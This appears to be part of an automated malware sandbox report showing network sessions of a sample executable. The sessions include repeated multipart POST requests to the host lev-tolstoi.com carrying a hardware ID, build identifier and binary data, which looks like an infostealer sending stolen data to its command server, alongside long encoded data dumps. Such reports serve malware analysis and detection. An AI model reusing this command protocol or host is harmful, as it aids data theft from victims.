                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 49 44 53 68 4f 42 75 50 71 5a 6e 6a 6b 50 4f 64 65 38 48 67 4d 69 2b 4d 33 61 4a 4a 45 6a 2b 61 63 30 59 67 66 49 36 61 53 79 77 6b 4b 49 67 46 65 6f 4c 46 63 66 2f 38 69 2f 56 7a 75 64 45 75 63 70 43 6b 6e 6b 6b 44 4a 73 64 2b 5a 79 6c 45 68 76 64 32 55 53 43 6f 67 44 56 32 33 74 45 55 37 36 6d 50 72 45 2b 64 79 44 4d 7a 74 4b 43 61 55 52 63 2b 73 31 4e 4b 50 46 44 53 75 6c 4d 45 46 43 6a 30 45 55 61 43 35 55 33 48 2f 49 76 68 58 37 58 4e 4b 6c 4b 31 75 5a 74 56 50 31 2f 36 45 6d 61 63 55 4e 71 4b 52 32 6b 6f 77 63 42 45 51 75 76 6c 54 64 37 56 31 73 6c 76 6c 66 55 2b 66 6f 69 30 67 6e 6c 72 50 72 4e 72 55 67 51 4d 67 6f 4a 50 47 43 78 67 36 41 46 69 67 73 46 39 79 38 43 72 32 45 36 34 2b 53 34 7a 74 64 6d 69 30 52 63 53 79 31 73 36 45 55 54 6e 72 68 49
                                                                                                                                                                                                                                                                  Data Ascii: IDShOBuPqZnjkPOde8HgMi+M3aJJEj+ac0YgfI6aSywkKIgFeoLFcf/8i/VzudEucpCknkkDJsd+ZylEhvd2USCogDV23tEU76mPrE+dyDMztKCaURc+s1NKPFDSulMEFCj0EUaC5U3H/IvhX7XNKlK1uZtVP1/6EmacUNqKR2kowcBEQuvlTd7V1slvlfU+foi0gnlrPrNrUgQMgoJPGCxg6AFigsF9y8Cr2E64+S4ztdmi0RcSy1s6EUTnrhI
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 42 46 69 73 74 46 67 37 75 32 33 31 53 36 41 6d 44 4c 36 75 4f 69 75 66 43 76 71 39 30 74 65 44 42 32 61 36 30 39 56 49 44 54 78 4f 42 75 4f 30 56 58 50 7a 50 2f 31 65 34 33 42 43 6d 36 67 68 49 4a 56 49 77 72 76 59 30 6f 38 53 4b 36 47 50 78 67 67 43 4e 51 39 55 71 66 6b 61 4f 2f 49 31 73 67 75 67 54 31 75 66 37 78 73 72 6d 30 62 49 71 4a 7a 47 79 67 68 6d 6f 70 47 4d 55 45 6f 39 42 6c 75 6d 74 6c 56 78 2b 79 6a 34 58 2b 68 77 54 34 61 69 4b 69 69 5a 51 4d 57 7a 30 74 32 4d 47 43 32 75 6d 38 77 4a 41 48 42 41 48 71 53 68 46 43 4f 31 47 66 56 66 37 58 45 4f 6f 61 34 67 4a 70 4a 65 6a 36 47 53 77 4d 51 57 4b 75 58 46 6a 41 51 44 4d 41 56 55 70 37 6c 54 64 76 41 75 39 56 44 74 65 55 61 61 71 69 6f 6b 6e 45 58 4a 76 74 76 64 67 51 4d 6a 72 4a 48 41 53 45 52
                                                                                                                                                                                                                                                                  Data Ascii: BFistFg7u231S6AmDL6uOiufCvq90teDB2a609VIDTxOBuO0VXPzP/1e43BCm6ghIJVIwrvY0o8SK6GPxggCNQ9UqfkaO/I1sgugT1uf7xsrm0bIqJzGyghmopGMUEo9BlumtlVx+yj4X+hwT4aiKiiZQMWz0t2MGC2um8wJAHBAHqShFCO1GfVf7XEOoa4gJpJej6GSwMQWKuXFjAQDMAVUp7lTdvAu9VDteUaaqioknEXJvtvdgQMjrJHASER
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 50 64 4e 4f 2f 49 68 73 67 75 67 64 30 57 47 6f 79 41 68 6d 45 37 48 75 64 4c 55 6a 78 63 74 6f 70 72 4b 42 51 49 39 43 31 32 69 76 56 35 70 39 69 62 34 58 75 6f 2b 41 74 53 71 4e 6d 6a 4e 43 4f 69 79 39 63 6d 66 41 7a 44 6c 67 6f 49 52 53 6a 63 43 48 76 76 35 56 33 54 38 49 76 70 62 37 33 46 49 6d 71 73 6f 4a 5a 42 48 78 61 7a 55 31 34 6b 61 4b 61 36 50 7a 41 55 4f 50 41 70 57 71 4c 4d 55 4e 62 55 71 36 68 4f 34 50 6e 6d 5a 6f 69 34 72 67 77 6a 51 38 4d 57 5a 67 78 31 6d 2f 64 33 41 42 67 6f 2f 41 6c 4b 6f 73 56 56 33 2b 79 72 33 57 75 68 32 58 70 57 70 4a 69 6d 62 52 38 36 36 32 64 79 41 46 69 4b 6a 6b 6f 78 47 53 6a 63 57 48 76 76 35 65 31 7a 41 62 39 4e 70 6f 47 45 43 6a 65 30 70 4a 4e 55 51 6a 37 4c 66 31 59 77 65 49 4b 79 52 78 67 45 42 50 41 56 61
                                                                                                                                                                                                                                                                  Data Ascii: PdNO/Ihsgugd0WGoyAhmE7HudLUjxctoprKBQI9C12ivV5p9ib4Xuo+AtSqNmjNCOiy9cmfAzDlgoIRSjcCHvv5V3T8Ivpb73FImqsoJZBHxazU14kaKa6PzAUOPApWqLMUNbUq6hO4PnmZoi4rgwjQ8MWZgx1m/d3ABgo/AlKosVV3+yr3Wuh2XpWpJimbR8662dyAFiKjkoxGSjcWHvv5e1zAb9NpoGECje0pJNUQj7Lf1YweIKyRxgEBPAVa
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC901INData Raw: 37 36 4c 50 4e 56 38 6e 6c 46 68 71 4d 6a 4a 35 31 41 78 72 2f 59 33 49 6b 58 4b 71 2b 63 79 77 59 45 4f 45 34 51 34 37 35 4d 4f 36 31 74 30 30 50 37 62 46 71 5a 6a 43 4d 6e 31 56 65 42 70 35 7a 65 69 46 46 2b 35 5a 54 65 44 41 63 69 42 31 6d 74 74 6c 64 70 39 43 44 35 51 65 64 78 53 4a 4f 68 4b 43 65 54 53 63 71 30 30 4e 36 42 47 69 6d 70 33 59 4a 49 44 53 68 4f 42 75 4f 58 58 32 6a 69 4c 76 78 59 39 6d 55 4d 69 2b 4d 33 61 4a 4a 45 6a 2b 61 63 32 6f 38 61 49 71 57 52 7a 41 77 48 4d 42 78 52 70 4c 35 64 63 4f 63 6e 39 56 54 72 64 6b 65 62 71 7a 77 6b 6d 31 72 4b 72 4d 36 5a 79 6c 45 68 76 64 32 55 53 44 77 33 48 6b 36 67 2b 32 56 74 39 6a 76 35 58 75 77 2b 55 39 71 30 62 69 2b 5a 43 4a 66 2b 32 74 61 4e 45 69 6d 6b 6c 4d 41 46 44 7a 6b 4c 58 36 57 39 58
                                                                                                                                                                                                                                                                  Data Ascii: 76LPNV8nlFhqMjJ51Axr/Y3IkXKq+cywYEOE4Q475MO61t00P7bFqZjCMn1VeBp5zeiFF+5ZTeDAciB1mttldp9CD5QedxSJOhKCeTScq00N6BGimp3YJIDShOBuOXX2jiLvxY9mUMi+M3aJJEj+ac2o8aIqWRzAwHMBxRpL5dcOcn9VTrdkebqzwkm1rKrM6ZylEhvd2USDw3Hk6g+2Vt9jv5Xuw+U9q0bi+ZCJf+2taNEimklMAFDzkLX6W9X
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 33 34 61 33 0d 0a 2f 39 56 34 58 39 45 6e 4b 30 6f 49 70 46 4c 78 72 33 62 30 49 49 61 4a 61 2b 53 79 77 34 4f 4d 41 56 5a 72 62 39 52 63 50 78 74 76 42 50 6e 5a 67 7a 4d 37 51 67 4c 68 31 72 39 73 4e 2f 43 78 41 35 6f 76 4e 33 4c 42 45 70 6f 54 6c 57 72 74 6b 5a 2b 2f 43 58 32 57 75 42 36 52 70 6d 71 4c 69 32 59 54 63 75 77 32 4e 36 45 48 53 6d 69 6c 63 4d 4d 43 6a 39 4f 45 4f 4f 2b 54 44 75 74 62 64 4a 59 39 6c 39 43 6e 37 39 75 4e 39 74 52 6a 37 6e 51 6d 64 78 52 4b 4b 79 63 78 41 59 47 4f 41 70 4d 6f 37 4a 64 64 50 51 69 38 6c 44 68 64 45 53 47 71 79 34 6a 6e 55 2f 48 75 74 4c 4c 68 52 35 6d 36 39 33 4c 45 45 70 6f 54 6d 2b 31 76 6c 4e 30 74 77 54 31 53 4f 46 30 54 35 2b 68 62 6a 66 62 55 59 2b 35 30 4a 6e 63 55 53 75 70 6b 4d 67 61 42 6a 41 4f 56 36
                                                                                                                                                                                                                                                                  Data Ascii: 34a3/9V4X9EnK0oIpFLxr3b0IIaJa+Syw4OMAVZrb9RcPxtvBPnZgzM7QgLh1r9sN/CxA5ovN3LBEpoTlWrtkZ+/CX2WuB6RpmqLi2YTcuw2N6EHSmilcMMCj9OEOO+TDutbdJY9l9Cn79uN9tRj7nQmdxRKKycxAYGOApMo7JddPQi8lDhdESGqy4jnU/HutLLhR5m693LEEpoTm+1vlN0twT1SOF0T5+hbjfbUY+50JncUSupkMgaBjAOV6
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 2b 79 6a 7a 58 2b 70 35 51 6f 61 73 4a 43 53 55 54 38 69 31 7a 74 4b 57 47 69 36 6d 6b 38 51 42 43 6a 34 4f 58 36 36 35 46 44 57 31 4b 75 6f 54 75 44 35 70 74 37 6f 34 49 74 64 72 32 4b 6a 57 33 6f 67 48 4c 61 53 65 32 67 55 61 63 45 41 65 73 72 35 46 4f 36 30 37 34 6b 54 6e 59 51 4b 4e 37 53 6b 6b 31 52 43 50 74 64 50 58 69 52 6f 69 72 4a 6a 45 43 77 38 31 42 46 4b 76 75 46 78 79 2f 79 6a 33 56 65 70 39 51 70 75 73 49 69 79 63 52 73 62 2b 6b 70 6d 44 43 57 62 39 33 66 6f 59 44 53 67 44 54 75 47 4c 56 32 72 6b 4f 50 39 44 35 6a 78 6a 6c 36 45 74 4c 5a 4a 59 6a 36 47 53 77 4d 51 57 4b 75 58 46 6a 41 67 4f 50 41 31 5a 72 62 5a 5a 64 50 49 6d 2f 56 6e 75 62 45 4f 52 70 53 49 67 6d 46 72 46 74 4d 37 51 6a 52 77 6f 72 59 2f 50 53 45 52 77 43 55 62 6a 34 52 52
                                                                                                                                                                                                                                                                  Data Ascii: +yjzX+p5QoasJCSUT8i1ztKWGi6mk8QBCj4OX665FDW1KuoTuD5pt7o4Itdr2KjW3ogHLaSe2gUacEAesr5FO6074kTnYQKN7Skk1RCPtdPXiRoirJjECw81BFKvuFxy/yj3Vep9QpusIiycRsb+kpmDCWb93foYDSgDTuGLV2rkOP9D5jxjl6EtLZJYj6GSwMQWKuXFjAgOPA1ZrbZZdPIm/VnubEORpSIgmFrFtM7QjRworY/PSERwCUbj4RR
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 30 58 74 62 6b 2b 52 71 68 41 57 6d 30 2f 62 75 64 4c 66 68 46 46 6f 35 5a 4b 4d 55 44 4e 77 52 68 36 63 39 78 52 6a 74 58 57 79 5a 75 4e 77 51 70 4f 37 50 32 57 32 58 39 6d 30 78 35 75 69 46 6a 65 73 69 38 45 61 53 6e 35 4f 57 4f 50 68 42 44 57 31 4b 65 4d 54 75 43 34 65 7a 2f 68 39 66 38 55 61 30 50 44 46 6d 5a 4a 52 66 76 66 54 6a 42 70 4b 61 45 34 5a 6f 4b 74 47 66 66 59 37 38 52 54 65 51 47 79 66 75 79 38 6c 6e 6b 54 78 67 4d 6e 61 69 68 38 68 73 34 79 4d 52 6b 6f 2f 54 67 61 61 2b 52 77 37 79 6d 4f 79 53 36 41 6d 44 4b 47 75 49 43 61 53 58 74 37 7a 2f 4e 4b 53 45 43 75 75 6b 59 34 4a 42 79 41 4a 48 75 33 35 55 6a 75 74 66 62 77 54 35 47 38 4d 7a 50 31 38 63 38 41 62 6d 4f 36 4f 78 73 6f 49 5a 72 50 64 6c 46 70 45 63 42 77 65 2b 2f 6b 54 65 4f 63 2f
                                                                                                                                                                                                                                                                  Data Ascii: 0Xtbk+RqhAWm0/budLfhFFo5ZKMUDNwRh6c9xRjtXWyZuNwQpO7P2W2X9m0x5uiFjesi8EaSn5OWOPhBDW1KeMTuC4ez/h9f8Ua0PDFmZJRfvfTjBpKaE4ZoKtGffY78RTeQGyfuy8lnkTxgMnaih8hs4yMRko/Tgaa+Rw7ymOyS6AmDKGuICaSXt7z/NKSECuukY4JByAJHu35UjutfbwT5G8MzP18c8AbmO6OxsoIZrPdlFpEcBwe+/kTeOc/
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1369INData Raw: 31 4d 6e 2b 31 67 61 4a 4d 49 6c 2b 79 53 6d 59 41 41 5a 76 33 4e 6e 6c 4e 66 59 31 6b 4f 38 61 59 61 59 72 55 37 73 67 75 79 4d 41 79 47 37 58 5a 6f 30 6b 76 64 72 4e 72 61 6b 68 4a 68 6d 36 50 71 43 77 30 32 44 56 43 30 71 42 5a 55 39 69 62 2b 58 2b 64 6f 63 71 71 34 4c 53 61 62 54 39 6d 76 6e 4a 66 45 48 6d 62 39 70 49 77 5a 41 44 64 43 46 75 2b 6f 52 33 58 2b 4f 2f 55 54 33 7a 41 4d 6a 4f 31 32 61 4b 42 4c 77 62 44 62 7a 35 56 63 41 4b 61 61 79 67 73 45 4a 78 38 65 37 66 6c 53 4f 36 31 2f 76 42 50 6b 62 77 7a 4d 2f 58 78 7a 77 42 75 59 37 6f 37 47 79 67 68 6d 73 39 32 55 57 30 52 77 48 42 37 37 2b 52 4e 31 2b 43 7a 78 58 65 4e 73 58 70 4b 75 4f 43 76 53 64 76 47 62 30 64 53 42 48 79 47 62 6f 2b 30 43 47 6a 30 42 57 5a 32 48 59 32 72 79 50 62 42 31 34
                                                                                                                                                                                                                                                                  Data Ascii: 1Mn+1gaJMIl+ySmYAAZv3NnlNfY1kO8aYaYrU7sguyMAyG7XZo0kvdrNrakhJhm6PqCw02DVC0qBZU9ib+X+docqq4LSabT9mvnJfEHmb9pIwZADdCFu+oR3X+O/UT3zAMjO12aKBLwbDbz5VcAKaaygsEJx8e7flSO61/vBPkbwzM/XxzwBuY7o7Gyghms92UW0RwHB77+RN1+CzxXeNsXpKuOCvSdvGb0dSBHyGbo+0CGj0BWZ2HY2ryPbB14


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.849707104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3I
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 12822
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC12822OUTData Raw: 2d 2d 5a 4b 58 58 38 49 44 41 4f 4d 31 4e 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 4b 58 58 38 49 44 41 4f 4d 31 4e 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 4b 58 58 38 49 44 41 4f 4d 31 4e 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 4b 58 58 38 49 44 41
                                                                                                                                                                                                                                                                  Data Ascii: --ZKXX8IDAOM1N3IContent-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--ZKXX8IDAOM1N3IContent-Disposition: form-data; name="pid"2--ZKXX8IDAOM1N3IContent-Disposition: form-data; name="lid"PsFKDg--pablo--ZKXX8IDA
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:50 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=0hh0urt5o8hfdu3glfv2bb59hv; expires=Fri, 18 Apr 2025 00:05:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlYzObvsw7maFicZm4tApZchePhU9y3l1e1f31djvwadvfBNQKQMb6me4qG8Cx0wuyTZWnMn5R9G53XZSg4QNBg5MLj%2B3HVYaqnte21Vy7SSGVMAnmgBycfpwnmoWmSTQdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c910ebd4302-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1564&rtt_var=601&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13757&delivery_rate=1796923&cwnd=252&unsent_bytes=0&cid=544eab8b04a94ad2&ts=756&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.849708104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:52 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=KR0VE528KXP
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 15033
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:52 UTC15033OUTData Raw: 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                  Data Ascii: --KR0VE528KXPContent-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--KR0VE528KXPContent-Disposition: form-data; name="pid"2--KR0VE528KXPContent-Disposition: form-data; name="lid"PsFKDg--pablo--KR0VE528KXPCont
                                                                                                                                                                                                                                                                  2024-12-23 06:18:53 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:52 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=eh07i3emli34f6jichch001t25; expires=Fri, 18 Apr 2025 00:05:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uj2TeDqKgrcT%2FEMqX3WHlP%2BbgN0lIE1hK%2Fz002mSGf3C9LTUjE8a0YeYL89yU4%2FciCeh%2FPLy49uERnrrJf4HYHQWE1v3m4Cx553IKY07RN%2B48lCfqAo5qU%2BBqwvzaqW4c%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c9e090d4381-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1570&rtt_var=598&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15965&delivery_rate=1815920&cwnd=211&unsent_bytes=0&cid=e324f8c591519fd4&ts=838&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:18:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.849710104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:54 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=RW4EII7M5UG7
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 20206
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:54 UTC15331OUTData Raw: 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: --RW4EII7M5UG7Content-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--RW4EII7M5UG7Content-Disposition: form-data; name="pid"3--RW4EII7M5UG7Content-Disposition: form-data; name="lid"PsFKDg--pablo--RW4EII7M5UG7
                                                                                                                                                                                                                                                                  2024-12-23 06:18:54 UTC4875OUTData Raw: 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                                                                                                  2024-12-23 06:18:55 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=2utgb84mvrde7ns5vd88psf0kk; expires=Fri, 18 Apr 2025 00:05:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Im%2BznI93eYlwqE8ocPewjKZO9ioxTZiIFKiHxAXiGtPEiPJnxafmRqZjwOwDzikj2ts90GhHzLCITUmmsmtfmvjGrgQFFTjCgJX21pBWUBpuWTONxZ68frsDzDMip41yuMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663cae2b3b43f7-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
